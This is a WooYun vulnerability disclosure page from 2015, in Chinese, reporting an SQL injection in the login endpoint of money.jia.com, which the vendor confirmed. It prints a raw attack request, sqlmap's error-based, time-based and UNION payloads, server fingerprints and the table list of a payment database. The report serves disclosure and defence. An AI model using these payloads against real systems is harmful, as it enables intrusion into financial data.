当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156986

漏洞标题:齐家某重要系统存在SQL注入漏洞

相关厂商:jia.com

漏洞作者: 路人甲

提交时间:2015-11-30 09:41

修复时间:2016-01-14 10:04

公开时间:2016-01-14 10:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

详细说明:

POST /index.php?c=login&m=get_login_area HTTP/1.1
Content-Length: 333
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=tth9od1e979qnfi197aln7ql76; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22b31e60a96ab3c9216f49cf6a23c11f57%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22113.134.39.39%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1448828093%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D18001cb5b45a405b93e90c0d7b4bb66a
Host: money.jia.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
login_name=1

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: login_name (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: login_name=1' AND (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x71787a7071,(SELECT (ELT(1285=1285,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kSpI'='kSpI
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: login_name=1' AND (SELECT * FROM (SELECT(SLEEP(5)))HcCA) AND 'JFxN'='JFxN
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: login_name=1' UNION ALL SELECT CONCAT(0x71787a7071,0x58756646446344714a47,0x7170627171),NULL#
---
web server operating system: Windows 7
web application technology: PHP 5.3.10, Apache 2.2.27
back-end DBMS: MySQL 5.0
Database: wallet
[96 tables]
+---------------------------------+
| admin_log |
| admin_role |
| admin_role_function |
| admin_user |
| admin_user_copy |
| api_text |
| api_time_log |
| area |
| checkin |
| company |
| company_details |
| company_shop |
| config |
| create_pay_log |
| function_details |
| function_group |
| gz_audit |
| gz_audit_check |
| gz_audit_details |
| gz_audit_enter |
| gz_audit_id |
| gz_audit_tmp |
| gz_audit_transfer |
| gz_cash_details |
| gz_company |
| gz_company_detail |
| gz_enter |
| gz_enter_id |
| gz_notc_users |
| gz_receipt_log |
| gz_shop_collection |
| gz_transfer_id |
| ip_collection |
| ip_login |
| ip_order |
| ip_sign |
| key_cash_id |
| log_admin_log |
| log_login |
| mobile_terminal_check_log |
| order_shipment |
| pay_fail |
| pay_list_status |
| pay_sms_log |
| pay_user_sign |
| pos_install |
| pos_type |
| query_pay_log |
| receipt_log |
| recharge_log |
| shop_gather |
| sms_verify |
| user_information |
| user_order_list |
| user_recharge |
| wallet_acquire_list |
| wallet_cash |
| wallet_cash_confirm |
| wallet_cash_details |
| wallet_cash_refund |
| wallet_cash_trade |
| wallet_credit |
| wallet_hanging |
| wallet_hanging_remarks |
| wallet_log |
| wallet_log_201419 |
| wallet_log_201420 |
| wallet_log_201421 |
| wallet_log_201422 |
| wallet_log_201423 |
| wallet_log_201424 |
| wallet_log_201425 |
| wallet_log_201426 |
| wallet_log_201427 |
| wallet_log_201428 |
| wallet_log_201429 |
| wallet_log_201430 |
| wallet_log_201431 |
| wallet_log_201432 |
| wallet_log_201433 |
| wallet_log_201434 |
| wallet_log_201435 |
| wallet_log_201436 |
| wallet_log_201437 |
| wallet_log_201438 |
| wallet_log_201439 |
| wallet_log_201440 |
| wallet_log_201441 |
| wallet_log_201442 |
| wallet_log_201443 |
| wallet_request_log |
| wallet_seller_account |
| wallet_seller_account_temp |
| wallet_seller_account_temp_copy |
| wallet_slip_no |
| wallet_sms_reply |
+---------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 10:02

厂商回复:

谢谢提交!

最新状态:

暂无


漏洞评价:

评价